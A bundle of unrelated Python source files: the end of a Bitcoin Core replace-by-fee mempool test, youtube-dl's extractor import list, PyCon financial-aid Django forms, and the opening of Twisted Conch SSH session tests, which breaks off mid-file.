tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.001*COIN), CScript([b'a'*999000]))]
tx1b_hex = txToHex(tx1b)
# This will raise an exception due to insufficient fee
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx1b_hex, 0)
def test_spends_of_conflicting_outputs(self):
"""Replacements that spend conflicting tx outputs are rejected"""
utxo1 = make_utxo(self.nodes[0], int(1.2*COIN))
utxo2 = make_utxo(self.nodes[0], 3*COIN)
tx1a = CTransaction()
tx1a.vin = [CTxIn(utxo1, nSequence=0)]
tx1a.vout = [CTxOut(int(1.1 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, 0)
tx1a_txid = int(tx1a_txid, 16)
# Direct spend an output of the transaction we're replacing.
tx2 = CTransaction()
tx2.vin = [CTxIn(utxo1, nSequence=0), CTxIn(utxo2, nSequence=0)]
tx2.vin.append(CTxIn(COutPoint(tx1a_txid, 0), nSequence=0))
tx2.vout = tx1a.vout
tx2_hex = txToHex(tx2)
# This will raise an exception
assert_raises_rpc_error(-26, "bad-txns-spends-conflicting-tx", self.nodes[0].sendrawtransaction, tx2_hex, 0)
# Spend tx1a's output to test the indirect case.
tx1b = CTransaction()
tx1b.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0)]
tx1b.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1b_hex = txToHex(tx1b)
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, 0)
tx1b_txid = int(tx1b_txid, 16)
tx2 = CTransaction()
tx2.vin = [CTxIn(utxo1, nSequence=0), CTxIn(utxo2, nSequence=0),
CTxIn(COutPoint(tx1b_txid, 0))]
tx2.vout = tx1a.vout
tx2_hex = txToHex(tx2)
# This will raise an exception
assert_raises_rpc_error(-26, "bad-txns-spends-conflicting-tx", self.nodes[0].sendrawtransaction, tx2_hex, 0)
def test_new_unconfirmed_inputs(self):
"""Replacements that add new unconfirmed inputs are rejected"""
confirmed_utxo = make_utxo(self.nodes[0], int(1.1*COIN))
unconfirmed_utxo = make_utxo(self.nodes[0], int(0.1*COIN), False)
tx1 = CTransaction()
tx1.vin = [CTxIn(confirmed_utxo)]
tx1.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1_hex = txToHex(tx1)
self.nodes[0].sendrawtransaction(tx1_hex, 0)
tx2 = CTransaction()
tx2.vin = [CTxIn(confirmed_utxo), CTxIn(unconfirmed_utxo)]
tx2.vout = tx1.vout
tx2_hex = txToHex(tx2)
# This will raise an exception
assert_raises_rpc_error(-26, "replacement-adds-unconfirmed", self.nodes[0].sendrawtransaction, tx2_hex, 0)
def test_too_many_replacements(self):
"""Replacements that evict too many transactions are rejected"""
# Try directly replacing more than MAX_REPLACEMENT_LIMIT
# transactions
# Start by creating a single transaction with many outputs
initial_nValue = 10*COIN
utxo = make_utxo(self.nodes[0], initial_nValue)
fee = int(0.0001*COIN)
split_value = int((initial_nValue-fee)/(MAX_REPLACEMENT_LIMIT+1))
outputs = []
for i in range(MAX_REPLACEMENT_LIMIT+1):
outputs.append(CTxOut(split_value, CScript([1])))
splitting_tx = CTransaction()
splitting_tx.vin = [CTxIn(utxo, nSequence=0)]
splitting_tx.vout = outputs
splitting_tx_hex = txToHex(splitting_tx)
txid = self.nodes[0].sendrawtransaction(splitting_tx_hex, 0)
txid = int(txid, 16)
# Now spend each of those outputs individually
for i in range(MAX_REPLACEMENT_LIMIT+1):
tx_i = CTransaction()
tx_i.vin = [CTxIn(COutPoint(txid, i), nSequence=0)]
tx_i.vout = [CTxOut(split_value - fee, DUMMY_P2WPKH_SCRIPT)]
tx_i_hex = txToHex(tx_i)
self.nodes[0].sendrawtransaction(tx_i_hex, 0)
# Now create doublespend of the whole lot; should fail.
# Need a big enough fee to cover all spending transactions and have
# a higher fee rate
double_spend_value = (split_value-100*fee)*(MAX_REPLACEMENT_LIMIT+1)
inputs = []
for i in range(MAX_REPLACEMENT_LIMIT+1):
inputs.append(CTxIn(COutPoint(txid, i), nSequence=0))
double_tx = CTransaction()
double_tx.vin = inputs
double_tx.vout = [CTxOut(double_spend_value, CScript([b'a']))]
double_tx_hex = txToHex(double_tx)
# This will raise an exception
assert_raises_rpc_error(-26, "too many potential replacements", self.nodes[0].sendrawtransaction, double_tx_hex, 0)
# If we remove an input, it should pass
double_tx = CTransaction()
double_tx.vin = inputs[0:-1]
double_tx.vout = [CTxOut(double_spend_value, CScript([b'a']))]
double_tx_hex = txToHex(double_tx)
self.nodes[0].sendrawtransaction(double_tx_hex, 0)
def test_opt_in(self):
"""Replacing should only work if orig tx opted in"""
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
# Create a non-opting in transaction
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0xffffffff)]
tx1a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, 0)
# This transaction isn't shown as replaceable
assert_equal(self.nodes[0].getmempoolentry(tx1a_txid)['bip125-replaceable'], False)
# Shouldn't be able to double-spend
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.9 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx1b_hex = txToHex(tx1b)
# This will raise an exception
assert_raises_rpc_error(-26, "txn-mempool-conflict", self.nodes[0].sendrawtransaction, tx1b_hex, 0)
tx1_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
# Create a different non-opting in transaction
tx2a = CTransaction()
tx2a.vin = [CTxIn(tx1_outpoint, nSequence=0xfffffffe)]
tx2a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx2a_hex = txToHex(tx2a)
tx2a_txid = self.nodes[0].sendrawtransaction(tx2a_hex, 0)
# Still shouldn't be able to double-spend
tx2b = CTransaction()
tx2b.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2b.vout = [CTxOut(int(0.9 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx2b_hex = txToHex(tx2b)
# This will raise an exception
assert_raises_rpc_error(-26, "txn-mempool-conflict", self.nodes[0].sendrawtransaction, tx2b_hex, 0)
# Now create a new transaction that spends from tx1a and tx2a
# opt-in on one of the inputs
# Transaction should be replaceable on either input
tx1a_txid = int(tx1a_txid, 16)
tx2a_txid = int(tx2a_txid, 16)
tx3a = CTransaction()
tx3a.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0xffffffff),
CTxIn(COutPoint(tx2a_txid, 0), nSequence=0xfffffffd)]
tx3a.vout = [CTxOut(int(0.9*COIN), CScript([b'c'])), CTxOut(int(0.9*COIN), CScript([b'd']))]
tx3a_hex = txToHex(tx3a)
tx3a_txid = self.nodes[0].sendrawtransaction(tx3a_hex, 0)
# This transaction is shown as replaceable
assert_equal(self.nodes[0].getmempoolentry(tx3a_txid)['bip125-replaceable'], True)
tx3b = CTransaction()
tx3b.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0)]
tx3b.vout = [CTxOut(int(0.5 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx3b_hex = txToHex(tx3b)
tx3c = CTransaction()
tx3c.vin = [CTxIn(COutPoint(tx2a_txid, 0), nSequence=0)]
tx3c.vout = [CTxOut(int(0.5 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx3c_hex = txToHex(tx3c)
self.nodes[0].sendrawtransaction(tx3b_hex, 0)
# If tx3b was accepted, tx3c won't look like a replacement,
# but make sure it is accepted anyway
self.nodes[0].sendrawtransaction(tx3c_hex, 0)
def test_prioritised_transactions(self):
# Ensure that fee deltas used via prioritisetransaction are
# correctly used by replacement logic
# 1. Check that feeperkb uses modified fees
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, 0)
# Higher fee, but the actual fee per KB is much lower.
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.001*COIN), CScript([b'a'*740000]))]
tx1b_hex = txToHex(tx1b)
# Verify tx1b cannot replace tx1a.
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx1b_hex, 0)
# Use prioritisetransaction to set tx1a's fee to 0.
self.nodes[0].prioritisetransaction(txid=tx1a_txid, fee_delta=int(-0.1*COIN))
# Now tx1b should be able to replace tx1a
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, 0)
assert tx1b_txid in self.nodes[0].getrawmempool()
# 2. Check that absolute fee checks use modified fee.
tx1_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx2a = CTransaction()
tx2a.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx2a_hex = txToHex(tx2a)
self.nodes[0].sendrawtransaction(tx2a_hex, 0)
# Lower fee, but we'll prioritise it
tx2b = CTransaction()
tx2b.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2b.vout = [CTxOut(int(1.01 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx2b.rehash()
tx2b_hex = txToHex(tx2b)
# Verify tx2b cannot replace tx2a.
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx2b_hex, 0)
# Now prioritise tx2b to have a higher modified fee
self.nodes[0].prioritisetransaction(txid=tx2b.hash, fee_delta=int(0.1*COIN))
# tx2b should now be accepted
tx2b_txid = self.nodes[0].sendrawtransaction(tx2b_hex, 0)
assert tx2b_txid in self.nodes[0].getrawmempool()
def test_rpc(self):
us0 = self.nodes[0].listunspent()[0]
ins = [us0]
outs = {self.nodes[0].getnewaddress() : Decimal(1.0000000)}
rawtx0 = self.nodes[0].createrawtransaction(ins, outs, 0, True)
rawtx1 = self.nodes[0].createrawtransaction(ins, outs, 0, False)
json0 = self.nodes[0].decoderawtransaction(rawtx0)
json1 = self.nodes[0].decoderawtransaction(rawtx1)
assert_equal(json0["vin"][0]["sequence"], 4294967293)
assert_equal(json1["vin"][0]["sequence"], 4294967295)
rawtx2 = self.nodes[0].createrawtransaction([], outs)
frawtx2a = self.nodes[0].fundrawtransaction(rawtx2, {"replaceable": True})
frawtx2b = self.nodes[0].fundrawtransaction(rawtx2, {"replaceable": False})
json0 = self.nodes[0].decoderawtransaction(frawtx2a['hex'])
json1 = self.nodes[0].decoderawtransaction(frawtx2b['hex'])
assert_equal(json0["vin"][0]["sequence"], 4294967293)
assert_equal(json1["vin"][0]["sequence"], 4294967294)
if __name__ == '__main__':
ReplaceByFeeTest().main()
|
|
from .academicearth import AcademicEarthCourseIE
from .addanime import AddAnimeIE
from .aftonbladet import AftonbladetIE
from .anitube import AnitubeIE
from .aparat import AparatIE
from .appletrailers import AppleTrailersIE
from .archiveorg import ArchiveOrgIE
from .ard import ARDIE
from .arte import (
ArteTvIE,
ArteTVPlus7IE,
ArteTVCreativeIE,
ArteTVConcertIE,
ArteTVFutureIE,
ArteTVDDCIE,
)
from .auengine import AUEngineIE
from .bambuser import BambuserIE, BambuserChannelIE
from .bandcamp import BandcampIE, BandcampAlbumIE
from .bbccouk import BBCCoUkIE
from .blinkx import BlinkxIE
from .bliptv import BlipTVIE, BlipTVUserIE
from .bloomberg import BloombergIE
from .br import BRIE
from .breakcom import BreakIE
from .brightcove import BrightcoveIE
from .c56 import C56IE
from .canal13cl import Canal13clIE
from .canalplus import CanalplusIE
from .canalc2 import Canalc2IE
from .cbs import CBSIE
from .ceskatelevize import CeskaTelevizeIE
from .channel9 import Channel9IE
from .chilloutzone import ChilloutzoneIE
from .cinemassacre import CinemassacreIE
from .clipfish import ClipfishIE
from .cliphunter import CliphunterIE
from .clipsyndicate import ClipsyndicateIE
from .cmt import CMTIE
from .cnn import (
CNNIE,
CNNBlogsIE,
)
from .collegehumor import CollegeHumorIE
from .comedycentral import ComedyCentralIE, ComedyCentralShowsIE
from .condenast import CondeNastIE
from .criterion import CriterionIE
from .crunchyroll import CrunchyrollIE
from .cspan import CSpanIE
from .d8 import D8IE
from .dailymotion import (
DailymotionIE,
DailymotionPlaylistIE,
DailymotionUserIE,
)
from .daum import DaumIE
from .dotsub import DotsubIE
from .dreisat import DreiSatIE
from .defense import DefenseGouvFrIE
from .discovery import DiscoveryIE
from .dropbox import DropboxIE
from .ebaumsworld import EbaumsWorldIE
from .ehow import EHowIE
from .eighttracks import EightTracksIE
from .eitb import EitbIE
from .elpais import ElPaisIE
from .escapist import EscapistIE
from .everyonesmixtape import EveryonesMixtapeIE
from .exfm import ExfmIE
from .extremetube import ExtremeTubeIE
from .facebook import FacebookIE
from .faz import FazIE
from .firstpost import FirstpostIE
from .firsttv import FirstTVIE
from .fktv import (
FKTVIE,
FKTVPosteckeIE,
)
from .flickr import FlickrIE
from .fourtube import FourTubeIE
from .franceinter import FranceInterIE
from .francetv import (
PluzzIE,
FranceTvInfoIE,
FranceTVIE,
GenerationQuoiIE,
CultureboxIE,
)
from .freesound import FreesoundIE
from .freespeech import FreespeechIE
from .funnyordie import FunnyOrDieIE
from .gamekings import GamekingsIE
from .gamespot import GameSpotIE
from .gametrailers import GametrailersIE
from .gdcvault import GDCVaultIE
from .generic import GenericIE
from .googleplus import GooglePlusIE
from .googlesearch import GoogleSearchIE
from .hark import HarkIE
from .helsinki import HelsinkiIE
from .hotnewhiphop import HotNewHipHopIE
from .howcast import HowcastIE
from .huffpost import HuffPostIE
from .hypem import HypemIE
from .ign import IGNIE, OneUPIE
from .imdb import (
ImdbIE,
ImdbListIE
)
from .ina import InaIE
from .infoq import InfoQIE
from .instagram import InstagramIE
from .internetvideoarchive import InternetVideoArchiveIE
from .iprima import IPrimaIE
from .ivi import (
IviIE,
IviCompilationIE
)
from .jadorecettepub import JadoreCettePubIE
from .jeuxvideo import JeuxVideoIE
from .jukebox import JukeboxIE
from .justintv import JustinTVIE
from .jpopsukitv import JpopsukiIE
from .kankan import KankanIE
from .keezmovies import KeezMoviesIE
from .khanacademy import KhanAcademyIE
from .kickstarter import KickStarterIE
from .keek import KeekIE
from .kontrtube import KontrTubeIE
from .la7 import LA7IE
from .lifenews import LifeNewsIE
from .liveleak import LiveLeakIE
from .livestream import LivestreamIE, LivestreamOriginalIE
from .lynda import (
LyndaIE,
LyndaCourseIE
)
from .m6 import M6IE
from .macgamestore import MacGameStoreIE
from .mailru import MailRuIE
from .malemotion import MalemotionIE
from .mdr import MDRIE
from .metacafe import MetacafeIE
from .metacritic import MetacriticIE
from .mit import TechTVMITIE, MITIE, OCWMITIE
from .mixcloud import MixcloudIE
from .mpora import MporaIE
from .mofosex import MofosexIE
from .mooshare import MooshareIE
from .mtv import (
MTVIE,
MTVIggyIE,
)
from .muzu import MuzuTVIE
from .myspace import MySpaceIE
from .myspass import MySpassIE
from .myvideo import MyVideoIE
from .naver import NaverIE
from .nba import NBAIE
from .nbc import (
NBCIE,
NBCNewsIE,
)
from .ndr import NDRIE
from .ndtv import NDTVIE
from .newgrounds import NewgroundsIE
from .nfb import NFBIE
from .nhl import NHLIE, NHLVideocenterIE
from .niconico import NiconicoIE
from .ninegag import NineGagIE
from .normalboots import NormalbootsIE
from .novamov import NovaMovIE
from .nowness import NownessIE
from .nowvideo import NowVideoIE
from .ooyala import OoyalaIE
from .orf import ORFIE
from .pbs import PBSIE
from .photobucket import PhotobucketIE
from .playvid import PlayvidIE
from .podomatic import PodomaticIE
from .pornhd import PornHdIE
from .pornhub import PornHubIE
from .pornotube import PornotubeIE
from .prosiebensat1 import ProSiebenSat1IE
from .pyvideo import PyvideoIE
from .radiofrance import RadioFranceIE
from .rbmaradio import RBMARadioIE
from .redtube import RedTubeIE
from .ringtv import RingTVIE
from .ro220 import Ro220IE
from .rottentomatoes import RottenTomatoesIE
from .roxwel import RoxwelIE
from .rtlnow import RTLnowIE
from .rutube import (
RutubeIE,
RutubeChannelIE,
RutubeMovieIE,
RutubePersonIE,
)
from .rutv import RUTVIE
from .savefrom import SaveFromIE
from .servingsys import ServingSysIE
from .sina import SinaIE
from .slashdot import SlashdotIE
from .slideshare import SlideshareIE
from .smotri import (
SmotriIE,
SmotriCommunityIE,
SmotriUserIE,
SmotriBroadcastIE,
)
from .sohu import SohuIE
from .soundcloud import SoundcloudIE, SoundcloudSetIE, SoundcloudUserIE
from .southparkstudios import (
SouthParkStudiosIE,
SouthparkDeIE,
)
from .space import SpaceIE
from .spankwire import SpankwireIE
from .spiegel import SpiegelIE
from .spike import SpikeIE
from .stanfordoc import StanfordOpenClassroomIE
from .statigram import StatigramIE
from .steam import SteamIE
from .streamcloud import StreamcloudIE
from .streamcz import StreamCZIE
from .syfy import SyfyIE
from .sztvhu import SztvHuIE
from .teamcoco import TeamcocoIE
from .techtalks import TechTalksIE
from .ted import TEDIE
from .testurl import TestURLIE
from .tf1 import TF1IE
from .theplatform import ThePlatformIE
from .thisav import ThisAVIE
from .tinypic import TinyPicIE
from .toutv import TouTvIE
from .traileraddict import TrailerAddictIE
from .trilulilu import TriluliluIE
from .trutube import TruTubeIE
from .tube8 import Tube8IE
from .tudou import TudouIE
from .tumblr import TumblrIE
from .tutv import TutvIE
from .tvigle import TvigleIE
from .tvp import TvpIE
from .udemy import (
UdemyIE,
UdemyCourseIE
)
from .unistra import UnistraIE
from .ustream import UstreamIE, UstreamChannelIE
from .vbox7 import Vbox7IE
from .veehd import VeeHDIE
from .veoh import VeohIE
from .vesti import VestiIE
from .vevo import VevoIE
from .vice import ViceIE
from .viddler import ViddlerIE
from .videobam import VideoBamIE
from .videodetective import VideoDetectiveIE
from .videofyme import VideofyMeIE
from .videopremium import VideoPremiumIE
from .vimeo import (
VimeoIE,
VimeoChannelIE,
VimeoUserIE,
VimeoAlbumIE,
VimeoGroupsIE,
VimeoReviewIE,
)
from .vine import VineIE
from .viki import VikiIE
from .vk import VKIE
from .vube import VubeIE
from .wat import WatIE
from .wdr import WDRIE
from .weibo import WeiboIE
from .wimp import WimpIE
from .wistia import WistiaIE
from .worldstarhiphop import WorldStarHipHopIE
from .xhamster import XHamsterIE
from .xnxx import XNXXIE
from .xvideos import XVideosIE
from .xtube import XTubeIE
from .yahoo import (
YahooIE,
YahooNewsIE,
YahooSearchIE,
)
from .youjizz import YouJizzIE
from .youku import YoukuIE
from .youporn import YouPornIE
from .youtube import (
YoutubeIE,
YoutubeChannelIE,
YoutubeFavouritesIE,
YoutubeHistoryIE,
YoutubePlaylistIE,
YoutubeRecommendedIE,
YoutubeSearchDateIE,
YoutubeSearchIE,
YoutubeSearchURLIE,
YoutubeShowIE,
YoutubeSubscriptionsIE,
YoutubeTopListIE,
YoutubeTruncatedURLIE,
YoutubeUserIE,
YoutubeWatchLaterIE,
)
from .zdf import ZDFIE
_ALL_CLASSES = [
klass
for name, klass in globals().items()
if name.endswith('IE') and name != 'GenericIE'
]
_ALL_CLASSES.append(GenericIE)
def gen_extractors():
""" Return a list of an instance of every supported extractor.
The order does matter; the first extractor matched is the one handling the URL.
"""
return [klass() for klass in _ALL_CLASSES]
def get_info_extractor(ie_name):
"""Returns the info extractor class with the given ie_name"""
return globals()[ie_name+'IE']
|
|
from django import forms
from django.core.exceptions import ValidationError
from django.forms import Textarea, Select
from django.utils.translation import ugettext_lazy as _
from .models import FinancialAidApplication, FinancialAidMessage, \
FinancialAidReviewData, FinancialAidEmailTemplate, Receipt, \
RECEIPT_TYPE_CHOICES
def validate_is_checked(value):
if not value:
raise ValidationError(
_('Please read the page, then click this box')
)
class FinancialAidApplicationForm(forms.ModelForm):
i_have_read = forms.BooleanField(
label='I have read the <a href="/2019/financial-assistance/">Financial Assistance</a> page',
required=False, # so our own validator gets called
validators=[validate_is_checked],
)
class Meta:
model = FinancialAidApplication
fields = [
'i_have_read',
'first_time',
'amount_requested',
'international',
'travel_plans',
'profession',
'involvement',
'what_you_want',
'experience_level',
'presenting',
'presented',
'pyladies_grant_requested',
]
widgets = {
'travel_plans': Textarea(
attrs={'cols': 80, 'rows': 10,
'class': 'fullwidth-textarea',
'maxlength': 1024}),
'what_you_do': Textarea(
attrs={'cols': 80, 'rows': 10,
'class': 'fullwidth-textarea',
'maxlength': 500}),
'involvement': Textarea(
attrs={'cols': 80, 'rows': 10,
'class': 'fullwidth-textarea',
'maxlength': 1024}),
'what_you_want': Textarea(
attrs={'cols': 80, 'rows': 10,
'class': 'fullwidth-textarea',
'maxlength': 500}),
}
help_texts = {
'experience_level': (
'We welcome people of all experience levels.'
' What is your experience level with Python?'
),
'international': (
'Check the box if you will be traveling internationally,'
' or from anywhere outside of the continental United States.'
),
'involvement': (
'Describe your involvement in any open source projects'
' or Python communities, local or international.'
),
'profession': (
'What is your career? If you are a student,'
' what is the name of the school you are attending?'
),
'pyladies_grant_requested': (
"Would you like to be considered for a PyLadies grant?"
" (For women, including cis women,"
" trans women, and non-binary people.)"
),
'travel_plans': (
"Please describe your travel plans. "
" Planes? Trains? Automobiles?"
" If traveling internationally,"
" let us know which country you will travel from."
),
}
class SpeakerGrantRequestForm(forms.ModelForm):
i_have_read = forms.BooleanField(
label='I have read the <a href="/2019/financial-assistance/">Financial Assistance</a> page.',
required=False, # so our own validator gets called
validators=[validate_is_checked],
)
class Meta:
model = FinancialAidApplication
fields = [
'i_have_read',
'amount_requested',
'international',
'travel_plans',
]
widgets = {
'travel_plans': Textarea(
attrs={'cols': 80, 'rows': 10,
'class': 'fullwidth-textarea',
'maxlength': 1024}),
}
help_texts = {
'international': (
'Check the box if you will be traveling internationally,'
' or from anywhere outside of the continental United States.'
),
'i_have_read': (
"Our speaker grant program is operated as part of PyCon's "
"<a href=\"/2019/financial-assistance/\"> Financial Assistance</a> "
"program"
),
'travel_plans': (
"Please describe your travel plans. "
" Planes? Trains? Automobiles?"
" If traveling internationally,"
" let us know which country you will travel from."
),
}
class FinancialAidReviewForm(forms.ModelForm):
class Meta:
model = FinancialAidReviewData
fields = ['status', 'amount', 'grant_letter_sent', 'reimbursement_method',
'notes', 'disbursement_notes',
'promo_code']
widgets = {
'notes': Textarea(
attrs={'cols': 80, 'rows': 5,
'class': 'fullwidth-textarea'}),
'travel_preferred_disbursement': Textarea(
attrs={'cols': 80, 'rows': 5,
'class': 'fullwidth-textarea'}),
'grant_letter_sent': Select(
choices=(
(False, _("No")),
(True, _("Yes")),
)
),
}
class FinancialAidAcceptOfferForm(forms.ModelForm):
class Meta:
model = FinancialAidReviewData
fields = [
'reimbursement_method',
'legal_name',
'address',
]
widgets = {
'address': Textarea(
attrs={'cols': 80, 'rows': 4,
'class': 'fullwidth-textarea',
'maxlength': 4096}),
}
help_texts = {
'reimbursement_method': (
"The PSF offers three options for receiving payment in USD: "
"PayPal, check, and wire transfer."
),
'legal_name': (
"Your legal name should match the name displayed on your "
"government-issued picture identification. We require your "
"legal name for tax purposes, and collecting it ahead of time "
"will speed up the up the reimbursement process at PyCon."
),
'address': (
"Please include your street address/PO Box, city, state, "
"zip code, and country. We are required "
"to collect the address in order to establish further "
"information about your identity."
),
}
def clean(self):
cleaned_data = super(FinancialAidAcceptOfferForm, self).clean()
reimbursement_method = cleaned_data.get("reimbursement_method")
legal_name = cleaned_data.get("legal_name")
address = cleaned_data.get("address")
errors = []
if not reimbursement_method:
errors.append(ValidationError(_("Must select a Reimbursement Method")))
if not legal_name:
errors.append(ValidationError(_("Must provide your Legal Name")))
if not address:
errors.append(ValidationError(_("Must provide your Mailing Address")))
if errors:
raise ValidationError(errors)
class MessageForm(forms.ModelForm):
class Meta:
model = FinancialAidMessage
fields = [
"message"
]
widgets = {
'message': Textarea(attrs={'class': 'fullwidth-textarea'}),
}
class ReviewerMessageForm(forms.ModelForm):
class Meta:
model = FinancialAidMessage
fields = [
"visible",
"message"
]
widgets = {
'message': Textarea(attrs={'class': 'fullwidth-textarea'}),
}
class BulkEmailForm(forms.Form):
subject = forms.CharField()
template = forms.ModelChoiceField(
queryset=FinancialAidEmailTemplate.objects.all(),
empty_label=u"Pick a bulk mail template to use",
)
confirm = forms.BooleanField(required=False)
RECEIPT_TYPE_CHOICES_EMPTY = [('', '------')] + list(RECEIPT_TYPE_CHOICES)
class ReceiptForm(forms.ModelForm):
receipt_type = forms.ChoiceField(choices=RECEIPT_TYPE_CHOICES_EMPTY, required=True)
class Meta:
model = Receipt
fields = ["receipt_type", "date", "amount", "description", "receipt_image"]
help_texts = {'description': "Please enter a description of this receipt"}
def clean(self):
cleaned_data = super(ReceiptForm, self).clean()
receipt_type = cleaned_data.get("receipt_type")
description = cleaned_data.get("description")
if receipt_type == 'other' and not description:
msg = "Description must be provided for 'Other' receipts."
self.add_error("description", msg)
|
|
# Copyright (c) 2007-2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for the 'session' channel implementation in twisted.conch.ssh.session.
See also RFC 4254.
"""
import os, signal, sys, struct
from zope.interface import implements
from twisted.internet.error import ProcessTerminated, ProcessDone
from twisted.python.failure import Failure
from twisted.conch.ssh import common, session, connection
from twisted.internet import defer, protocol, error
from twisted.python import components, failure
from twisted.trial import unittest
class SubsystemOnlyAvatar(object):
"""
A stub class representing an avatar that is only useful for
getting a subsystem.
"""
def lookupSubsystem(self, name, data):
"""
If the other side requests the 'subsystem' subsystem, allow it by
returning a MockProtocol to implement it. Otherwise, return
None which is interpreted by SSHSession as a failure.
"""
if name == 'subsystem':
return MockProtocol()
class StubAvatar:
"""
A stub class representing the avatar representing the authenticated user.
It implements the I{ISession} interface.
"""
def lookupSubsystem(self, name, data):
"""
If the user requests the TestSubsystem subsystem, connect them to a
MockProtocol. If they request neither, then None is returned which is
interpreted by SSHSession as a failure.
"""
if name == 'TestSubsystem':
self.subsystem = MockProtocol()
self.subsystem.packetData = data
return self.subsystem
class StubSessionForStubAvatar(object):
"""
A stub ISession implementation for our StubAvatar. The instance
variables generally keep track of method invocations so that we can test
that the methods were called.
@ivar avatar: the L{StubAvatar} we are adapting.
@ivar ptyRequest: if present, the terminal, window size, and modes passed
to the getPty method.
@ivar windowChange: if present, the window size passed to the
windowChangned method.
@ivar shellProtocol: if present, the L{SSHSessionProcessProtocol} passed
to the openShell method.
@ivar shellTransport: if present, the L{EchoTransport} connected to
shellProtocol.
@ivar execProtocol: if present, the L{SSHSessionProcessProtocol} passed
to the execCommand method.
@ivar execTransport: if present, the L{EchoTransport} connected to
execProtocol.
@ivar execCommandLine: if present, the command line passed to the
execCommand method.
@ivar gotEOF: if present, an EOF message was received.
@ivar gotClosed: if present, a closed message was received.
"""
implements(session.ISession)
def __init__(self, avatar):
"""
Store the avatar we're adapting.
"""
self.avatar = avatar
self.shellProtocol = None
def getPty(self, terminal, window, modes):
"""
If the terminal is 'bad', fail. Otherwise, store the information in
the ptyRequest variable.
"""
if terminal != 'bad':
self.ptyRequest = (terminal, window, modes)
else:
raise RuntimeError('not getting a pty')
def windowChanged(self, window):
"""
If all the window sizes are 0, fail. Otherwise, store the size in the
windowChange variable.
"""
if window == (0, 0, 0, 0):
raise RuntimeError('not changing the window size')
else:
self.windowChange = window
def openShell(self, pp):
"""
If we have gotten a shell request before, fail. Otherwise, store the
process protocol in the shellProtocol variable, connect it to the
EchoTransport and store that as shellTransport.
"""
if self.shellProtocol is not None:
raise RuntimeError('not getting a shell this time')
else:
self.shellProtocol = pp
self.shellTransport = EchoTransport(pp)
def execCommand(self, pp, command):
"""
If the command is 'true', store the command, the process protocol, and
the transport we connect to the process protocol. Otherwise, just
store the command and raise an error.
"""
self.execCommandLine = command
if command == 'success':
self.execProtocol = pp
elif command[:6] == 'repeat':
self.execProtocol = pp
self.execTransport = EchoTransport(pp)
pp.outReceived(command[7:])
else:
raise RuntimeError('not getting a command')
def eofReceived(self):
"""
Note that EOF has been received.
"""
self.gotEOF = True
def closed(self):
"""
Note that close has been received.
"""
self.gotClosed = True
components.registerAdapter(StubSessionForStubAvatar, StubAvatar,
session.ISession)
class MockProcessProtocol(protocol.ProcessProtocol):
"""
A mock ProcessProtocol which echoes back data sent to it and
appends a tilde. The tilde is appended so the tests can verify that
we received and processed the data.
@ivar packetData: C{str} of data to be sent when the connection is made.
@ivar data: a C{str} of data received.
@ivar err: a C{str} of error data received.
@ivar inConnectionOpen: True if the input side is open.
@ivar outConnectionOpen: True if the output side is open.
@ivar errConnectionOpen: True if the error side is open.
@ivar ended: False if the protocol has not ended, a C{Failure} if the
process has ended.
"""
packetData = ''
def connectionMade(self):
"""
Set up variables.
"""
self.data = ''
self.err = ''
self.inConnectionOpen = True
self.outConnectionOpen = True
self.errConnectionOpen = True
self.ended = False
if self.packetData:
self.outReceived(self.packetData)
def outReceived(self, data):
"""
Data was received. Store it and echo it back with a tilde.
"""
self.data += data
if self.transport is not None:
self.transport.write(data + '~')
def errReceived(self, data):
"""
Error data was received. Store it and echo it back backwards.
"""
self.err += data
self.transport.write(data[::-1])
def inConnectionLost(self):
"""
Close the input side.
"""
self.inConnectionOpen = False
def outConnectionLost(self):
"""
Close the output side.
"""
self.outConnectionOpen = False
def errConnectionLost(self):
"""
Close the error side.
"""
self.errConnectionOpen = False
def processEnded(self, reason):
"""
End the process and store the reason.
"""
self.ended = reason
class EchoTransport:
"""
A transport for a ProcessProtocol which echos data that is sent to it with
